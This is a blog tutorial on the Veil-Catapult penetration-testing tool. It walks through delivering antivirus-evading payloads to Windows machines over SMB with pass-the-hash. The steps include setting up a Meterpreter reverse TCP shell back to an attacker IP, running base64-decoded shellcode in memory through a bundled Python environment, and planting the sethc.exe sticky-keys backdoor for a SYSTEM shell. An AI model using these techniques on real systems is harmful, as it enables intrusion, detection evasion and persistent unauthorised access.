Creating standalone payloads using Veil-Catapult

102ada821a55c0245b3b1cfe82bec37f

We already know about Veil-Framework, They recently added a payload delivery tool Veil-Catapult. Working as like SMBexec with utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using temporary SMB server.

This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executable to bypass detection.

Its EXE delivery features seamless integration with Veil-Evasion is awesome,and we can specify our custom executable, otherwise can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, we have access to all the latest methods and modules as they’re released. After specifying our options and built an executable, we can dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be used is another specail.

So we now going to create our standalone payload  using Veil-Catapult.

For installing Veil-Catapult follow by previous post, after Veil-Catapult is installed, just run the script inside the Veil-Catapult directory.

#./Veil-Catapult.py

Veil-Catapult extends the capabilities of the existing Veil framework by utilizing various methods to deliver and trigger payloads across targeted machines. It had a following standlone payload creating techniques.

Screenshot from 2014-07-01 16:33:08

Powershell Injector:

It Execute the shellcode as defined in the script within the context of Powershell.

PowerShell script simply executes PowerShell.exe on the target system, which isn’t particularly suspicious and its remoting allows us to remotely execute scripts without ever writing to disk on the target system.

Screenshot from 2014-07-01 16:33:51

[>] Enter a target IP or target list: 192.168.31.2

[>] Enter a [domain/]username or credump file: sathish

[>] Enter a password or LM:NTLM hash: bhuvi

[>] Use pth-[wmis] (default) or pth-[winexe]? winexe

Screenshot from 2014-07-01 16:34:24

Now we are going to select msfvenom typing “1″

[>] Please enter the number of your choice :  1

After that we need to type some details:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20″

Enter value for ‘LPORT’: “8080″

Screenshot from 2014-07-01 16:34:35

Screenshot from 2014-07-01 16:35:21

And press Enter to launch and it will trigger power injection, then we get an meterpreter session.

Screenshot from 2014-07-01 16:58:33

Screenshot from 2014-07-01 16:59:16

Barebones Python Injector:

However, on assessments we still sometimes encounter machines without powershell installed or enabled. Wouldn’t it be nice to still have a method to invoke payloads without powershell that still granted trusted execution.

The Barebones Python injector released with Veil-Catapult addresses this problem. If you don’t have powershell access on a system for some reason, don’t really like dropping malicious EXEs to disk, or nasty AV white listing/reputation filers are causing you pain, this method provides you an alternative option for owning boxes with a trusted execution model.

To execute, a zipped ‘barebones’ Python environment is first uploaded to the victim machine’s temp directory using Impacket, along with a stand alone 7zip binary

A pth-wmis or pth-winexe command is used to unzip the environment, and a second command will invoke the extracted Python binary with the “-c” option. The passed string comprises a minimum Python program that will base64 decode a shellcode string and invoke it in memory.

Screenshot from 2014-07-01 16:59:43

Screenshot from 2014-07-01 17:00:12

Screenshot from 2014-07-01 17:00:44

Screenshot from 2014-07-01 17:01:09

Sethc Backdoor:

Reboot, hit Shift key 5 times, SYSTEM shell will pop up. Also there is script for it in metasploit.Check it out this awesome blog for more details.

This exploit  allows users to reset the Administrator password on Windows. It is done by booting from a repair disk, starting command prompt, and replacing C:\Windows\System32\sethc.exe with C:\Windows\System32\cmd.exe.

sethc.exe is a process associated with Windows NT High Contrast Invocation and is part of Microsoft Windows Operating System. With default Windows settings, this process is run when the shift is pressed 5 times in sequence, to invoke the StickyKeys configuration window

When the sticky key combination is pressed at the logon screen, users get access to a command prompt with Administrator privileges.

This is a huge security hole, makes the OS vulnerable to anyone with even the slightest IT knowledge

Screenshot from 2014-07-01 17:01:59

Screenshot from 2014-07-01 17:02:19

Screenshot from 2014-07-01 17:02:38

forgot.administrator.password.sethc_thumb

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Digital Hacker

Digital Hacker

StormSecurity

IT Security Research and Services

govolution

About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

%d bloggers like this: